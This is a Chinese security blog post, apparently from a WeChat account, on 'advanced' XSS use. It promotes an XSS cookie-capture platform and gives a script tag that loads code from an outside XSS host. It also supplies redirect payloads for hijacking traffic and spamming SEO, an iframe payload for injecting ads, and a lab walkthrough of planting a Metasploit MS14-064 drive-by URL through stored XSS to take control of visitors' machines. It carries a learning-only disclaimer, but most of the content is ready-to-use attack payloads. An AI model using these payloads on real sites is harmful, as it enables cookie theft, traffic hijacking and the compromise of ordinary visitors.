~ 你是沿途,有青山举杯 ~
白小羽
以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!!
学网安,任何泷羽Sec团队,社群答疑,免费教学,内推红队从0-1,绝对0区。
xss平台:https://xssaq.com/
<sCRiPt sRC=//xs.pe/PNb></sCrIpT>
这里有一个xsslabs,利用我们的payload
xss平台已上线
查看功能
这里面有源码,xss站点的ua头,还有存储用户cookie信息机器的真实IP地址
地址很明确,是我自己的地址
广告传播/SEO优化/刷取流量
原理
通过恶意的xss代码将正常的页面跳转到目的地的页面,利用网站进行重定向实现引流、广告位传播等等。
实操
恶意刷取访问量,网页直接跳转
<script type="text/javascript">window.location.href="跳转的目的地址";</script>
<script type="text/javascript">window.location.replace("跳转的目的地址");</script>
<script type="text/javascript">window.location.assign("跳转的目的地址");</script>
注入成功,再次访问这个页面就会自动跳转到你的页面,从而达到访问量+1
第二种,网页延迟跳转
<script type="text/javascript">
function jumurl(){
window.location.href = 'https://www.baidu.com';
}
setTimeout(jumurl,3000);
</script>
恶意广告展示(需要5块钱吃外卖的记得扫个码嘞,美团优惠卷+平台双减)
<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='2000' height='5000' allowTransparency src=https://pic1.zhimg.com/v2-656b7df981ea18d18f196995f477d75d_xll.jpg?source=32738c0c&needBackground=1></iframe>");</script>
三、网页挂马/权限提升(MS14_064)
目的
通过木马服务器(kali)搭建生成一个恶意URL地址,并通过存储型XSS挂到页面中。只要存在未打相应补丁的用户访问了挂马页面,恶意攻击者便获取到了受害者的控制权限(重点在于目的系统是否打了相应补丁)
环境
木马服务器(Kali MS14-064 IP:192.168.7.129) 受害者(Windows Server 2003 R2 IP:192.168.7.136) 存在 XSS 的服务器(Win10 DVWA靶机 IP:192.168.1.103)
白小羽
MS14_064:受影响的操作系统版本有:Windows Vista、Windows Server 2012、Windows Server 2008、Windows RT、Windows 8.1、Windows 8 以及 Windows 7.
打开msf
搜索 ms14_064
依次设置好参数
没有成功,不知道为什么,我win7补丁都卸载了,这里只做演示,可以参考下文
https://blog.csdn.net/theRavensea/article/details/136793078
XSS插入地址
这个时候就能利用存储型xss漏洞将木马服务器生成的地址插入到网站中,这样只要有人的电脑存在该漏洞,就能上线:
可自行测试,我这里不是全新的win7,没有成功
学习于:
https://blog.csdn.net/Aaron_Miller/article/details/105918848
往期推荐
原文始发于微信公众号(泷羽Sec):XSS高级用法,SEO优化,挂ma,MS14_064
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论